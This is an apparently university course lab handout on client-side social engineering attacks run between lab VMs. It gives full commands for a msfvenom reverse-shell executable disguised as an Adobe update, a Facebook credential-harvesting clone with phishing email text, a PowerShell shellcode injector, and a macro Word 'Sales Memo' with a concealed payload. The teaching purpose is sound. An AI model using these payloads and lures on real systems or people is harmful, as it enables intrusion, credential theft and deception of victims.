Lab 9: Social Engineering

Today, social engineering attacks represent a major primary vector for hackers. As Bruce Schneier said, “Only amateurs attack machines; professionals target people.”1 Further, client-side software represents a much larger attack surface than server-side software. For these reason, many of the major breaches you read about in the news began with a client-side attack.

In this lab you’ll use two leading tools to perform client-side attacks: msfvenom and the Social Engineering Toolkit (SET).

Part 1. MSFVenom

In this section, you’ll use msfvenom to perform a client-side attack. Msfvenom can be used to turn Metasploit payloads into stand-alone executables that a user can be tricked into running. Your goal is to (1) create a malicious executable file, (2) host it on a web server, and (3) exploit your Windows 10 VM.

1. Open your Kali Linux and Windows 10 VMs. Make sure that both can ping each other.

2. On Windows, make sure Windows Defender is turned off. Click the windows button on the bottom left of the desktop and searching

for “Defender” and choose “Windows Defender Security Center.” Click the windows button on the bottom left of the desktop and searching

for “Defender” and choose “Windows Defender Security Center.” Move the “Real-time protection” slider to the left.

3. In Kali, type msfvenom --help-formats to see a list of output formats that msfvenom supports. We’ll use the “-f exe” option to create a Windows executable.

4. In Kali, run the following command, all on one line:

msfvenom -p windows/shell/reverse_tcp LHOST=[your Kali IP] LPORT=8080 -f exe > /tmp/AdobeUpdate.exe

Where:

-p Selects the payload-f Selects the file type of the output executableLHOST The IP of your Kali Linux VMLPORT The listening port on your Kali Linux VM

5. Verify that the output file is about 73802 bytes in size. If not, you may need to check that you entered the command correctly and run it again.

6. Now, set up a web server to host your malicious file. Change directories to /tmp by entering cd /tmp.

7. Still in Kali, run this command:

1 https://www.schneier.com/crypto-gram-0010.html

python -m SimpleHTTPServer 8888You should see a response that the Python webserver is listening on port 8888 on IP 0.0.0.0, which means all IP addresses on the local machine.

8. On your Windows 10 VM, browse to:

http://[IP of your Kali VM]:8888/

Verify that you can view the contents of /tmp on your Kali VM.

9. On Kali, open a new terminal window (besides the one that is running the Python webserver), and enter msfconsole.

10.Enter use exploit/multi/handler. Once you’ve switched to this exploit module, type show info. Note that this module “is a stub that provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework.” A stub adds additional functionality to other exploits.

11.Enter set PAYLOAD windows/shell/reverse_tcp.12.Enter set LHOST [IP of Kali VM].13.Enter set LPORT 8080.

Note: Set the port to “8080” (the port your malicious executable will use to connect back to your Kali VM), not “8888” (the port of your Python web server on Kali).

14.Enter exploit -j. The “-j” option “jobifies” the exploit, or runs it as a job in the background. You can see a list of jobs running in the background by using the command jobs.

15.On your Windows 10 VM, in a web browser (not Chrome, it’s too safe), download the AdobeUpdate.exe file from the Python webserver and run the executable. If a warning appears saying that Windows couldn’t access Windows SmartScreen, click “Run anyway.” For the warning, “Do you want to allow this app from an unknown publisher…,” click “Yes.”

16.On your Kali VM, you should see in your msfconsole that “Command shell session X opened),” where X is the number of the new session. Type:

sessions -i [the number of the new session]

This should open a shell on the Windows VM.

17.Type whoami to see the privileges that you are funning under. Note that these are the privileges of the user of your Windows 10 VM.

18.Run the command netstat -n to see a listing of open connections on the Windows VM. Note the “ESTABLISHED” connection from the Windows VM to your Kali VM.

19.Return to msfconsole by typing control + z. Enter “y” to background the session.

20.To close the session, type sessions -k 1.

Part 2. Social Engineering Toolkit (SET)

In this section, you’ll use the Social Engineering Toolkit (SET) to craft social engineering attacks.

Setup

Get the latest version of SET by entering the following commands in the Kali terminal (note: this lab was written for SET v. 6.0.5). To obtain the latest version of SET, use these commands:

cd /opt/git clone https://github.com/trustedsec/social-engineer-toolkit/ set/Note: There is a space between before the word ‘set/’.

Edit /opt/set/src/core/config.baseline and scroll to the bottom of the document. Change BLEEDING_EDGE=OFF to BLEEDING_EDGE=ON

Save the file and exit.

1. Return to the /opt/set directory and run the command ./setoolkit (don’t forget the “./” at the front). Agree to the terms of service. You should see a screen like the following:

2. Enter option 1 for social-engineering attacks. That should display this menu:

3. Select option 2 for website attack vectors. The next menu will list the various web attack vectors:

4. Select number 3 for a credential harvesting attack. This brings you to the following screen:

5. Select option 2 to clone a target website. This is a very sophisticated feature that can clone almost any website. After you’ve selected this feature, you’ll need to set an IP address to host the cloned site. Set “IP address for the POST back in Harvester/Tabnabbing” to the IP address of your Kali Linux VM.

Now you get to choose the website to clone. Set the cloned website to https://www.facebook.com (enter the full URL, including “https://”).

Note: When SET asks you about Apache, enable it to start the webserver.

If all has gone well, you should get the following screen:

6. Now it’s time to script the phishing message to send. At this point, an attacker would use a tool or service to send a spoofed email. For simplicity, skip this step and instead send an email to your own email account with the message:

“You are receiving this email because there is a problem with your account. Please go to www.facebook.com and login to verify your account."

Use rich text formatting to make “www.facebook.com” a hyperlink that points to http://[IP of your Kali VM].

7. When you receive the email, click the link, which should forward you to this page:

Note: the address bar indicates the actual IP of the attacker. This is the biggest indication that the site is forged. If this were a more sophisticated attempt, the attacker would obtain a domain that looked similar to Facebook (like facebook.webs.com) For this, one could use a site like http://freedns.afraid.org.

8. Enter credentials into the fields on the spoofed website. After you’ve filled the fields in with whatever words you wish, press the login button on the website. On your Kali VM, you should see something similar to this in your terminal window:

Part 3: Using PowerShell Shellcode Injector

In this section, you will generate an encoded PowerShell script and execute it on Windows which opens a Meterpreter session on attacker’s machine. Note that this script requires the user to bypass the PowerShell Execution Policy. It is your job to convince the victim to do this.

1. From SET menu, choose 1 for Social-Engineering Attacks.2. Select 9 for PowerShell Attack Vectors.3. Within this option, you will find four different features, select 1 for PowerShell

Alphanumeric Shellcode Injector.

4. Enter your Kali VM IP address and port 443. Choose yes to start the listener. This will start automatically open msfconsole, so it will take a minute or two.

5. While waiting, open another terminal and navigate to /root/.set/reports/powershell/

6. Open the script using the leafpad command:

leafpad x86_powershell_injection.txt

7. Copy the entire script you found on leafpad, paste the script on the windows command line as the figure depicts below. Then press enter.

8. You should see an opened Meterpreter session:

Note: Although Meterpreter is opened the first time, it may not show you Meterpreter shell. To connect to the open Meterpreter session, type “sessions -i 1” and you should connect to the Meterpreter.

Optional: you can save the entire script as a windows batch file (.bat), then trick the user to run that file.

Question: Do you need administrator rights to run this PowerShell script? What are the other ways you can trick user to run this script?

Part 4. SET Discovery

Complete one other attacks of your choosing using SET, and briefly describe your results below.

SET attack 1:

Note: If you encounter problems after running site cloning attacks more than once, you may need to delete index.html or index2.html from /var/www/html in between attempts.

Part 5. Create a Malicious Microsoft Word Document

In this section, you’ll create a macro enabled Microsoft Word file that opens a Meterpreter session on an attacker’s machine. Note that this is a feature of Word, and not a security vulnerability. For this reason, this attack vector will work as long as you can convince a user to open the Word file.

1. In Kali, run the following command (all one line):

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.1.61 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe

2. Read the beginning of the output. It explains that the output is divided into two sections: A “Macro” section and a “Payload” section. Copy all of the output from your terminal from this command, and paste it into a text file on your Windows VM (or onto a machine with Microsoft Word).

3. In Kali, run msfconsole and run the following commands:

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LPORT 8080set LHOST [IP of your Kali VM]exploit -j

The above commands will cause Metasploit to listen on port 8080 for an incoming Meterpreter connection.

4. Open Word on your host workstation and open the Visual Basic editor. To do this, from the File tab, select Options. Select “Customize Ribbon” from the left-hand side menu, and check the Developer checkbox (see screenshot below).

From the Developer ribbon, select “Visual Basic” to open the Visual Basic editor.

Inside the visual basic editor, right-click the document, select Insert > Module. Open the VB.txt file that you copied over from Kali. Paste in the VB code (but not the payload). Save it as a Word macro-enabled document and close the VB editor.

5. In the main body of the Word document, paste the payload hex code. Above the hex code, type a simple memo as the ostensible content of the memo. Next, highlight the hex code you pasted in and change the font size to “1” and the font color to white. This will make the hex code difficult to find for anyone who opens the document. Finally, save the document as a macro-enabled Word file (with a “.docm” extension). Name the file something like “Sales Memo.”

Optional: “In order to keep user suspicion low, try embedding the code in one of the many Word macro games that are available on the Internet. That way, the user is happily playing the game while you are working in the background. This gives you some

extra time to migrate to another process if you are using Meterpreter as a payload.” From Metasploit: The Pentester’s Guide.

6. Test that your malicious Word file by opening it on the Windows 10 VM. If Word asks, enable macro content. In the Kali VM, you should now see that a Meterpreter session has been opened to the host workstation. If it doesn’t work, make sure that macros are enabled in your Word doc (Developer tab Macro Security Enable all macros).

Optional: Use the sendEmail command on Kali to send a spoofed email with the malicious Word file as an attachment. To see how the sendEmail command works, type man sendEmail.

Lifelong Learning

“The Ghost in the Wires” by Kevin Mitnick

Autobiography of Kevin Mitnick, famed computer hacker and social engineer. In addition to being a very entertaining and fascinating read, you’ll learn a lot about social engineering techniques from the accounts of his experiences.

BYU Library: http://search.lib.byu.edu/byu/id:byu5094356 Amazon: http://amzn.com/0316037729

“The Art of Deception” by Kevin Mitnick

In-depth discussion of the techniques of social engineering and how to educate your organization to be less susceptible to these attacks.

Amazon: http://amzn.com/076454280X

“Social Engineering” by Christopher Hadnagy

Another well-regarded book on social engineering, from the organization that operates the Social Engineer Village at DEF CON.

Amazon: http://amzn.com/0470639539